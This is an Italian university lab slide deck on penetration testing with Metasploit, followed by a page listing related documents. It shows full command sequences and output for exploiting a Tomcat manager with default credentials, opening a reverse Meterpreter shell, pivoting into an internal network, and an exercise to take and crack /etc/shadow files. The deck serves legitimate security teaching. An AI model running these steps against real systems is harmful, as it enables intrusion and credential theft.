Penetration Testing. Metasploit
|
|
|
- Niccolina Murgia
- 9 anni fa
- Visualizzazioni
Transcript
1 Penetration Testing Metasploit Dipartimento di Informatica Via salaria Novembre 2011 Dott. Antonio Villani Dott. Nino Verde 1
2 Riferimenti Metasploit Unleashed - pdf scaricabile da: ploit%20unleashed.pdf 2
3 Metasploit Framework Il framework non e' un tool finalizzato alla realizzazione di attacchi per hacker ma un'interfaccia generale per testare e scrivere exploits. Un exploit è un codice che, sfruttando un bug o una vulnerabilità, porta all'acquisizione di privilegi o all'accesso del sistema cui viene applicato. 3
4 Metasploit Framework Piattaforma Open Source avanzata usata per sviluppare, testare e usare exploit code Disponibile per ogni sistema operativo Inizialmente sviluppato in Perl ora sviluppato in Ruby Architettura modulare, scriptabile... Moduli aggiuntivi Non richiede conoscenza di bug o scrittura di shellcode 4
5 Metasploit Framework Overview Metasploit permette di Ricercare nuove tecniche d'attacco Analizzare i metodi degli attaccanti Test di IDS/IPS Penetration Test 5
6 Exploits Piattaforme attaccabili: linux / macosx / solaris / windows / etc Exploits mirati alle applicazioni (Browsers, backup, ftp, etc ) Exploits remoti, ma privilege escalation possibile con meterpreter. Exploits organizzati attraverso path: /piattaforma/applicaozione/exploit (es: /windows/browser/ms06_001_wmf_setabortproc) 6
7 Metaexploits: evasione controlli IDS Codifica: spesso cambiare il payload di un exploit ne fa cambiare la signature NOP no operation Es: plugin ips_filter 7
8 Payload Il payload è il codice o il comando che vogliamo venga eseguito sull'host target Il Payload è spesso definito come shellcode. La definizione è imprecisa dato che un attacco non esegue necessariamente una shell, es: creazione nuovo utente, nuovo processo di controllo, rootkit, apertura socket di rete... 8
9 Interfacce Metasploit Framework Msfconsole: Console Interattiva Msfcli: linea di comando Msfpayload: permette di creare payload eseguibile Msfweb: Because everything has to have a web interface msfwx GUI: Graphical User Interfaces Msfapi: (in sviluppo) piattaforma di sviluppo modulare 9
10 Vediamolo in azione 10
11 Configurazione di Rete 11
12 Per iniziare... Userete putty (dalla vostra macchina windows) per connettervi via ssh alle macchina Kali User: root PSW: toor Cerchiamo di capire quanti host attivi ci sono sulla rete: $nmap /24 -n Per prima cosa faremo insieme una scansione delle porte aperte sulla prima macchina target $nmap n $sudo nmap -ss n SYN scan 12
13 Scansione delle vulnerabilità Dal risultato di nmap si capisce che ci sono moltissime porte aperte su questo host. Alcune anche anche sospette (IRC,telnet,etc.) Diamo un'occhiata con Nessus o OpenVas a possibili vulnerabilità Tra le tante vulnerabilità sembra che Tomcat abbia password di default, e metasploit ha un exploit per tale vulnerabilità che ci darà accesso da amministratore alla macchina Cercate gli exploit per tomcat e controllate le informazioni fornite dal framework metasploit (usate info o show options) Quale fa al caso nostro? 13
14 Usiamo ora Metasploit $msfconsole avvierà la console di metasploit Comandi utili: search VAR per eseguire una ricerca tra i moduli di metasploit use VAR per usare un particolare modulo. I moduli sono organizzati in una gerarchia ben definita info mostra delle informazioni sul modulo in uso show options mostra le opzioni da settare set VAR per impostare il valore di una variabile set payload VAR per impostare il payload Exploit lanciare l'exploit 14
15 Payload Ci sono tanti possibili payload. Ogni exploit ne supporta alcuni. Il payload va settato dopo aver scelto l'exploit da utilizzare. Meterpreter è uno dei payload più utili: È sostanzialmente una shell avanzata Diverse modalità di connessione: Bind tcp Reverse tcp Reverse http, etc.. 15
16 Exploit Tomcat on the first machine msf> use exploit/multi/http/tomcat_mgr_deploy SETTATE LE VARIE OPZIONI COME MOSTRATO DI SOTTO msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description PASSWORD tomcat no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST yes The target address RPORT 8180 yes The target port USERNAME tomcat no The username to authenticate as VHOST no HTTP server virtual host Payload options (java/meterpreter/reverse_tcp): Name Current Setting Required Description LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name Automatic LANCIATE L'EXPLOIT msf exploit(tomcat_mgr_deploy) > exploit
17 Getting the meterpreter session msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse handler on :4444 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 6471 bytes as UA99glu9ybDXRwb7YtZ4.war... [*] Executing /UA99glu9ybDXRwb7YtZ4/Zvuq4YcK2m.jsp... [*] Undeploying UA99glu9ybDXRwb7YtZ4... [*] Sending stage (30355 bytes) to [*] Meterpreter session 6 opened ( :4444 -> :47873) at :57: meterpreter >
18 Check configuration rpreter > ifconfig Interface 1 ============ Name : lo - lo Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : ::1 IPv6 Netmask : :: Interface 2 ============ Name : eth1 - eth1 Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : fe80::20c:29ff:fe9b:e8d0 IPv6 Netmask : :: Interface 3 ============ Name : eth0 - eth0 Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : fe80::20c:29ff:fe9b:e8c6 IPv6 Netmask : :: Meterpreter > Background session 6? [y/n] msf exploit(tomcat_mgr_deploy) >
19 Considerazioni Sembra che l'host ha effettivamente un altra scheda di rete configurata con indirizzo IP appartenente ad un'altra sottorete Vogliamo allora fare una scansione in quella sottorete Faremo pivoting attraverso la macchina già compromessa. Per prima cosa dobbiamo aggiungere una rotta...
20 Configurazione di Rete postexploitation
21 Alcuni comandi utili Prima di aggiungere una rotta impariamo ad usare le sessioni meterpreter Per mandare in background una sessione meterpreter usare il comando background Da msfconsole, il comando sessions vi resituisce una lista delle sessioni in background attive Vedere sessions -h per help Per ritornare ad una sessione in background usare: sessione -i NUMEROSESSIONE
22 Il comando route Il comando route permette di aggiungere delle rotte alla tabella di routing usata da metasploit. Con questo comando possiamo raggiungere sottoreti visibili soltanto da altri host che abbiamo precedentemente attaccato Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local.
23 Aggiungere una rotta verso la rete interna Una volta che la sessione meterpreter è in background possiamo aggiungere la nuova rotta. msf exploit(tomcat_mgr_deploy) > route add [*] Route added msf exploit(tomcat_mgr_deploy) > route print Active Routing Table ==================== Subnet Netmask Gateway Session 6
24 Scansione della rete interna (1/2) msf exploit(tomcat_mgr_deploy) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description CONCURRENCY 10 yes The number of concurrent ports to check per host PORTS yes Ports to scan (e.g ,80, ) RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds
25 Scansione della rete interna (2/2) msf auxiliary(tcp) > run [*] :25 - TCP OPEN [*] :21 - TCP OPEN [*] :22 - TCP OPEN [*] :23 - TCP OPEN [*] :53 - TCP OPEN [*] :80 - TCP OPEN [*] :111 - TCP OPEN [*] :139 - TCP OPEN [*] :445 - TCP OPEN [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) >
26 Configurare un proxy per raggiungere la rete interna da altre applicazioni Ora che abbiamo una rotta verso il target configuriamo un proxy che può essere usato da altre applicazioni diverse da meterpreter Metasploit ha un modulo che ci permette di fare ciò: auxiliary/server/socks4a Questo modulo permette di creare un proxy che utilizza la funzionalità di routing interna a Metasploit per redirigere le connessioni.
27 auxiliary/server/socks4a msf auxiliary(tcp) > use auxiliary/server/socks4a msf auxiliary(socks4a) > show options Module options (auxiliary/server/socks4a): Name Current Setting Required Description SRVHOST yes The address to listen on SRVPORT 1080 yes The port to listen on. msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) >
28 Proxychains Ora avremo un proxy in ascolto su localhost:1080 Dobbiamo configurare il tool che redirigerà verso tale proxy tutto il traffico: proxychains Modifichiamo /etc/proxychains.conf editando l'ultima riga, che diventerà: Socks proxychains nmap -st -n -PN L'opzione -PN evita l'utilizzo di pacchetti UDP non supportati da proxychain
29 Proviamo ad usare altri servizi proxychains ssh ProxyChains-3.1 ( S-chain -<> :1080-<><> :22-<><>-OK password:
30 Esercizio Continuare l'exploitation della seconda macchina Fare attenzione al payload di meterpreter utilizzato Spiegare perché java/meterpreter/reverse_tcp non può essere utilizzato Ci sono altri possibili target?
31 Esercizio PenTest Mandate una mail a [email protected] per ricevere le istruzioni ed i file necessari alla configurazione di una rete VPN Una volta stabilita la connessione con la VPN otterrete un indirizzo nella sottorete /24 Il vostro primo target è la macchina Una volta compromesso quel target dovrete continuare il lavoro di post-exploitation e trovare altri host vulnerabili Obiettivo: recuperare il file /etc/passwd e /etc/shadow di tutte le macchine compromesse e provare a crackare le password
32 Regole Non barate... ci possiamo accorgere di come siete arrivati alla soluzione Non modificate le impostazioni di rete delle macchine compromesse (interfacce, indirizzi ip, etc.) Appena compromessa una qualsiasi macchina mandate una mail a [email protected] Avrete tempo fino al 20 dicembre per terminare l'esercizio Entro quella data dovrete redigere un report delle attività svolte e delle vulnerabilità trovate ed exploitate Inserite quanti più dettagli possibili nel report
Hacker Frameworks & Risorse utili HACKER FRAMEWORKS
Hacker Frameworks & Risorse utili HACKER FRAMEWORKS In questo modulo vedremo sia i software framework più utilizzati in ambito di penetration testing sia le risorse, come ad esempio siti internet dedicati,
Rootkit. Dott. Ing. Igino Corona. Corso Sicurezza Informatica 2014/2015. igino.corona (at) diee.unica.it. Pattern Recognition and Applications Lab
Pattern Recognition and Applications Lab Rootkit Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza Informatica 2014/2015 Department of Electrical and Electronic Engineering University
1 GARR Tutorial sulla sicurezza informatica. R. Cecchini e O. Pinazza Roma, 16 17 18/11/2010
1 GARR Tutorial sulla sicurezza informatica R. Cecchini e O. Pinazza Roma, 16 17 18/11/2010 Programma della giornata 17 18 19 novembre 2010 1 a parte: vulnerabilità e backdoor in MS Windows Pausa pranzo
Setup dell ambiente virtuale
Setup dell ambiente virtuale 1.1 L immagine per le macchine virtuali Il file sicureti.iso è l immagine ISO di una distribuzione live di Linux (basata Debian Stretch, ottenuta con live-build, http://live.debian.net).
Sommario. Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0
Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0 Sommario 1. PREMESSA... 2 2. INSTALLAZIONE SOFTWARE VPN CLIENT... 2 3. PRIMO AVVIO E CONFIGURAZIONE
ULISSE LAB. CTF: How to improve your pentesting skills with HackTheBox
ULISSE LAB CTF: How to improve your pentesting skills with HackTheBox Capture The Flag L obiettivo principale è quello di trovare un file specifico all interno di una macchina vulnerabile. Questo può essere
Installazione e Configurazione del servizio DHCP. Orazio Battaglia
Installazione e Configurazione del servizio Orazio Battaglia Protocollo e Servizio Il protocollo (Dynamic Host Configuration Protocol) è un protocollo di rete di livello applicativo che permette ai dispositivi
Se per esempio inserisco show version ecco il risultato. Con il comando enable entro in privilege mode.
Laboratorio 1 Packet Tracer Prendiamo un router ed un computer. Prendiamo un console cable e lo colleghiamo alla console port del router e alla porta RS 232 del PC. Clicchiamo sul PC e scegliamo il Terminal.
Guida introduttiva su Eclipse. Ing. Marco Dell'Unto [email protected]
Guida introduttiva su Eclipse Ing. Marco Dell'Unto [email protected] Introduzione Eclipse è un ambiente di sviluppo (IDE) multilinguaggio e multipiattaforma scritto in Java. E Open Source. Può
Network Address Translation
Network Address Translation 1 Concetti di NAT e assegnazione IP pubblici L indirizzamento IP finora utilizzato è quello associato al protocollo IPv4. Ciascun indirizzo IPv4 è composto da 32 bit, quindi
Bucare WindowsXP SP2 con Metasploit
Bucare WindowsXP SP2 con Metasploit Vulnerabilità ms08_067_netapi Dall'introduzione del Service Pack 2, in data Agosto 2006, Windows XP era ritenuto molto più sicuro, vista l'introduzione di numerosi bugfix
02/10/2015 SISTEMI E RETI. Router Cisco. Parte 2 - IOS. A cura dell Ing. Claudio Traini. router. sottoreti. terminali
SISTEMI E RETI Router Cisco Parte 2 - IOS A cura dell Ing. Claudio Traini sottoreti router terminali 1 Livelli di accesso ai comandi Un router ha due livelli di accesso ai comandi User EXEC mode Privileged
HACKING LAB. con ProxMox e Metasploitable. Andrea Draghetti - 23 Maggio FabLab Bassa Romagna
HACKING LAB con ProxMox e Metasploitable $ whoami Phishing Analysis and Contrast @ D3Lab Team Member @ BackBox Linux Hacking Lab Un laboratorio nella propria infrastruttura di rete per allenarsi in assoluta
Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella
Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017 Ing. Niccolò Iardella [email protected] 1 Esercitazione 7 Configurazione del firewall 2 Programma
Protocollo ARP IP forwarding
Protocollo ARP IP forwarding A.A. 2018/2019 Walter Cerroni Reti IP come insiemi di indirizzi Una rete IP è individuata dall indirizzo di rete, che è quello con i bit dell Host-ID tutti a zero (in genere
Sistema operativo. Avere un architettura multi-core è un vantaggio
Sistema operativo Software responsabile del controllo e della gestione dei componenti hardware di un computer mediante interfaccia (driver), e della gestione dei vari programmi del computer. I programmi
Per connettere la MWDG-ETH a internet o per utilizzarla attraverso la rete LAN eseguire le seguenti operazioni:
Connessione LAN Per connettere la MWDG-ETH a internet o per utilizzarla attraverso la rete LAN eseguire le seguenti operazioni: 1) Alimentare la basestation MWDG-ETH 2) Connettere cavo ethernet tra basestation
Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2017/2018. Ing. Carlo Vallati
Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2017/2018 Ing. Carlo Vallati [email protected] 1 Esercitazione 2 Configurazione di interfacce di rete, gateway
Antonio Cianfrani. L emulatore Packet Tracer A.A. 2015/2016
Antonio Cianfrani L emulatore Packet Tracer A.A. 2015/2016 Packet Tracer (1/2) Che cosa è Packet Tracer? Cisco Packet Tracer è un software didattico per l emulazione di apparati di rete CISCO A cosa serve
AI 464 ETH NEW Gestione della scheda Eureka IP Interface (AI4164ETH NEW) Ottobre 2018
AI 464 ETH NEW Gestione della scheda Eureka IP Interfacee (AI4164ETH NEW) Ottobre 2018 INDICE INTRODUZIONE ACCESSO ALLA INTERFACCIA AI4164ETH NEW VIA WEB CONFIGURARE LE IMPOSTAZIONI GENERALI CONFIGURARE
Moduli Bluetooth 03 - connessione seriale via BT
Moduli Bluetooth 03 - connessione seriale via BT v 0.1 - Author: Mirco Piccin aka pitusso La connessione seriale ai moduli BT permette di inviare dati dal pc/smartphone/altro ad Arduino, in modalita wireless.
Reti di Comunicazione e Internet
Politecnico di Milano Dipartimento di Elettronica e Informazione Reti di Comunicazione e Internet Laboratorio 2. Packet Tracer Agenda della lezione CISCO IOS Command Line Interface: User Exec Mode Privileged
NAT: Network Address Translation
NAT: Network Address Translation Prima di tutto bisogna definire che cosa si sta cercando di realizzare con NAT 1. Stai cercando di consentire agli utenti interni di accedere a Internet? 2. Stai cercando
Relazione su METASPLOIT FRAMEWORK
Università degli Studi di Catania Corso di Laurea Specialistica in Ingegneria Informatica Sicurezza nei Sistemi Informativi Docente prof. O. Tomarchio Relazione su METASPLOIT FRAMEWORK Studenti Coco Ignazio
Seconda Prova in itinere Esempio
Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Seconda Prova in itinere Esempio Tempo complessivo a disposizione per lo svolgimento: 1h45m Usare
Proteggere la rete I FIREWALL (seconda parte)
Proteggere la rete I FIREWALL (seconda parte) Index Architetture di rete con Firewall A cosa serve il NAT Cosa sono gli Intrusion Detection System Esistono molte architetture possibili per inserire un
Esercitazione di Reti di Calcolatori Installazione Del Software https://www.netacad.com/courses/packet-tracer Sign in > Resources > Download Packet Tracer Packet Tracer Interface Ecco l interfaccia principale
Area FA-Teleassistenza Specifica tecnica STM33 Cliente: Mitsubishi
Area FA-Teleassistenza Specifica tecnica STM33 Cliente: Mitsubishi Teleassistenza Serie FX Serie Q ewon Mod. FA_STM_00 Data: 07.03.2013 Pag. 1/31 STM33.doc Rev. 01 Preparato da: Verificato da: Firme Massimiliano
INFOCOM Dept. Il routing
Il routing Funzione di instradamento nei Router IP I Router IP hanno la funzione di instradare i datagrammi in rete: ricevono un datagramma da una interfaccia, eseguono alcune operazioni e rilanciano il
Internet Protocol Versione 4: instradamento e routing. Aspetti di forwarding e routing del protocollo IPv4
Internet Protocol Versione 4: instradamento e routing Aspetti di forwarding e routing del protocollo IPv4 1 Instradamento (forwarding) Operazione comune a tutte le macchine con stack TCP/IP Router, end
Scritta da Andrea Cappa COME INSTALLARE LINUX IN UN HOST VIRTUALE
Scritta da Andrea Cappa COME INSTALLARE LINUX IN UN HOST VIRTUALE Di cosa abbiamo bisogno? 1 Virtual-Box 2 Una ISO di Linux 3 Una connessione ad internet Iniziamo Per prima cosa avviamo Virtual-Box, dopo
Antonio Cianfrani. Standard Access Control List (ACL)
Antonio Cianfrani Standard Access Control List (ACL) Indice Cosa sono le ACL? Interfacce Inbound & Outbound Wildcard mask Configurare una ACL standard ACL extended (prossima lezione) Named ACL (prossima
Introduzione ad hping
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2007/2008 Introduzione ad hping Roberto Paleari 2-4 Settembre 2008 Roberto Paleari Introduzione ad hping
Routing IP A.A. 2006/2007. Walter Cerroni. Routing gerarchico in Internet
Routing IP A.A. 2006/2007 Walter Cerroni Routing gerarchico in Internet Dal punto di vista del routing, Internet è suddivisa in modo gerarchico in Autonomous System (AS) un AS è un gruppo connesso di una
4.2 Collegamento con Mozilla Firefox o Google Chrome 5 Tool di configurazione rapida (Config Tool) Presentazione 5.2 Ricerca / Connessione
IT EN. 1 Presentazione generale... 4 1.1 Accessori 1.2 Specifiche 1.3 Configurazione predefinita della rete 2 Struttura... 7 2.1 Dimensioni 2.2 Sistema 3 Installazione... 9 3.1 Installazione dell'apparecchio
Seconda Prova in itinere Esempio
Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Seconda Prova in itinere Esempio Tempo complessivo a disposizione per lo svolgimento: 1h45m Usare
Ingegneria del Software 1: Eclipse
Ingegneria del Software 1: Eclipse Da completare entro Marzo 15, 2016 S. Krstić and M. Scavuzzo and F. Marconi and A. Rizzi and C. Menghi 1 Contents 1 Introduzione 3 1.1 Java (JRE vs JDK)..........................................
Guida Tecnica. Configurazione del Router ZyXEL P-660H-D1 per la visione da remoto di alcuni DVR Brahms, anche con IP dinamico.
Guida Tecnica Configurazione del Router ZyXEL P-660H-D1 per la visione da remoto di alcuni DVR Brahms, anche con IP dinamico. Se abbiamo la necessità di visionare da remoto un DVR, è opportuno configurare
Antonio Cianfrani. Dynamic Host Configuration Protocol (DHCP)
Antonio Cianfrani Dynamic Host Configuration Protocol (DHCP) Il protocollo DHCP Il protocollo DHCP consente ad un router di configurare dinamicamente gli host all interno di una LAN. Parametri da configurare:
Cloud Hik-Connect. Guida rapida per registrare un dispositivo su Hik-Connect
Cloud Hik-Connect Guida rapida per registrare un dispositivo su Hik-Connect Indice 1. Come registrare account Hik-Connect... 3 a. Registrazione tramite APP Hik-Connect... 3 b. Registrazione tramite web
Cosa è importante: pom.xml Goal Plug-in Repository
Cos è Maven? Maven è un software usato principalmente per la gestione di progetti Java e build automation, ma è utile anche per gestire documentazione, report, dipendenze... Cosa è importante: pom.xml
Penetration Testing Aziendale con BeEF
Penetration Testing Aziendale con BeEF Giovanni Cattani Giovanni Cattani Security Specialist @ Secure Network S.r.l. #penetrationtest #vulnerabilityassessment #web #mobile #network #riskassessment BeEF
Antonio Cianfrani. Configurazione di un Router CISCO A.A. 2015/2016
Antonio Cianfrani Configurazione di un Router CISCO A.A. 2015/2016 IOS Un router o uno switch non possono funzionare senza sistema operativo Studieremo il sistema operativo della Cisco: Cisco IOS L IOS
BOLLETTINO DI SICUREZZA INFORMATICA
STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 5/2008 Il bollettino può essere
Connessione con MySQL
Connessione con MySQL Architettura Server-Side Eventuali parametri cookie sessioni Elaborazione SELECT... DATABASE Quando i dati sono molti e la persistenza deve andare altre la sessione o la durata
Configurazione firewall Cisco ASA5505
Configurazione firewall Cisco ASA5505 Argomenti da trattare: Creazione della rete Assegnazione indirizzi Modifica delle impostazioni di default delle vlan esistenti Assegnazione della vlan ad una interfaccia
Difesa perimetrale di una rete
Muro tagliafuoco per: Evitare accessi indesiderati Controllare traffico di dati in uscita Tagliare i flussi di I/O generati da malware Filtrare i segmenti di una VLAN azione Tipi di firewall: Ingress firewall
mbnetfix NHF100 La seguente guida ha come scopo di fornire le indicazioni per una configurazione di base, per
mbnetfix NHF100 Guida base alla configurazione La seguente guida ha come scopo di fornire le indicazioni per una configurazione di base, per funzioni avanzate è possibile consultare il manuale completo
Software per l individuazione dei malfunzionamenti di rete
Software per l individuazione dei malfunzionamenti di rete ForTIC Percorso Formativo C2 Modulo 4 Fabio Calefato - ForTIC / C2 / Modulo 4 1 Strumenti utili ipconfig / ifconfig ping tracert / traceroute
IP forwarding Firewall e NAT
IP forwarding Firewall e NAT A.A. 2004/2005 Walter Cerroni IP forwarding Linux può funzionare da gateway tra due o più reti IP host1 host2 linux-gw 192.168.10.0/24 192.168.11.0/24 Il kernel deve essere
Sommario ... vi Sommario
Sommario.... Introduzione xiii Capitolo 1 1 test per la certificazione Microsoft 1 Condizioni di svolgimento dei test 2 Impostazione e caratteristiche dei test 3 Uso efficace dei software di test Microsoft
Metasploit Framework Version 2.2 Corso Crash per Utenti
Metasploit Framework Version 2.2 Corso Crash per Utenti Introduzione Questo documento vuole essere una sorta di guida per l utente alla versione 2.2 del Metasploit Framework (letteralmente framework vuole
Ethical Hacking Basic CONTENUTI
Ethical Hacking Basic Durata: 5 giorni Modulo 1: Penetration Test CONTENUTI Introduzione: tipologie di Penetration Test Metodologie e standard Aspetti normativi Fasi: 1. Il Footprinting dell'infrastruttura
Lezione 6: Dynamic Host Configuration Protocol
Lezione 6: Dynamic Host Configuration Protocol Università degli Studi di Milano Insegnamento di Terminologia - 1 ISO/OSI (Open System Interconnection) IP ARP Terminologia - 1 ISO/OSI (Open System Interconnection)
Il programma di gestione per il mondo della traduzione
SYLLXXX: Il programma di gestione per il mondo della traduzione INSTALLAZIONE Syllxxx- Versione 2.2.0 - Pag 1 Syllxxx- Versione 2.2.0 - Pag 2 Indice 1 Installazione 4 1.1 Syllxxx-PMN e Syllxxx-SMN 4 1.1.1
Esame Laboratorio di Sistemi Operativi Cognome Nome Mat.
Esame Laboratorio di Sistemi Operativi 2-01-2008 Il compito è costituito da domande chiuse e domande aperte. Non è consentito l uso di libri, manuali, appunti., etc. Tempo massimo 1 ora. Domande chiuse:
Antonio Cianfrani. Access Control List (ACL)
Antonio Cianfrani Access Control List (ACL) Indice Cosa sono le ACL? Configurare una ACL standard ACL extended Named ACL Restingere l accesso alle vty Cosa sono le ACL (1/3) Sono liste di condizioni applicate
Vulnerability Assessment Installazione e configurazione di OpenVAS
Vulnerability Assessment Installazione e configurazione di OpenVAS Introduzione 1. Introduzione 2. Installazione di OpenVAS su VM Centos7 3. Esecuzione di network scan su un target di esempio 4. Valutazione
Atlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: True DMZ Language: Italiano
Atlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: True DMZ Language: Italiano INTRODUZIONE Grazie a questa funzionalità è possibile creare una vera e propria
IN CEILING ACCESS POINT 300MBPS WL-ICNAP48-052
IN CEILING ACCESS POINT 300MBPS WL-ICNAP48-052 Grazie Per aver scelto un nostro prodotto INDICE Capitolo 1 Hardware ed alimentazione 1.1 Descrizione interfaccia 1.2 Alimentazione tramite adattatore PoE
Appello 13 Febbraio Tempo complessivo a disposizione per lo svolgimento: 2h Usare lo spazio dopo ogni Esercizio/Quesito per la risposta.
Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Appello 3 Febbraio 207 Tempo complessivo a disposizione per lo svolgimento: 2h Usare lo spazio dopo
Wireshark (packet sniffer)
Wireshark (packet sniffer) Introduzione In computing, Wireshark (ex Ethereal) is a protocol analyzer, or "packet sniffer" application, used for network troubleshooting, analysis, software and protocol
SIMULAZIONE DI UN PENETRATION TEST (PENETRATION TESTING SIMULATION)
Over Security SIMULAZIONE DI UN PENETRATION TEST (PENETRATION TESTING SIMULATION) Sommario Viene presentata la simulazione di un attacco informatico, Penetration Testing, un metodo per valutare la sicurezza
API Socket di Berkeley
Laboratorio Reti di Calcolatori (A.A. 2008-2009) Programmazione di rete ed interfaccia API socket di Berkeley Delfina Malandrino [email protected] http://www.dia.unisa.it/professori/delmal/ API Socket
Configurazione delle interfacce di rete
Configurazione delle interfacce di rete A.A. 2006/2007 Alessandro Botticelli Instradamento dei datagrammi IP Routing : scelta del percorso su cui inviare i dati i router formano struttura interconnessa
Cisco Internetwork Operating System. Introduzione
Cisco Internetwork Operating System Introduzione IOS e CLI IOS: marchio registrato, nome del sistema operativo presente sulla maggior parte dei router Cisco; presente anche su alcuni switch e su routing
1 Concetti di base... 3
1. Concetti di base 2. Gli attacchi informatici 3. Sicurezza informatica 4. L'attività di Ethical Hacking Syllabus rev. 1.0 1 Concetti di base... 3 1.1 Concetti di base di sicurezza informatica... 3 1.1.1
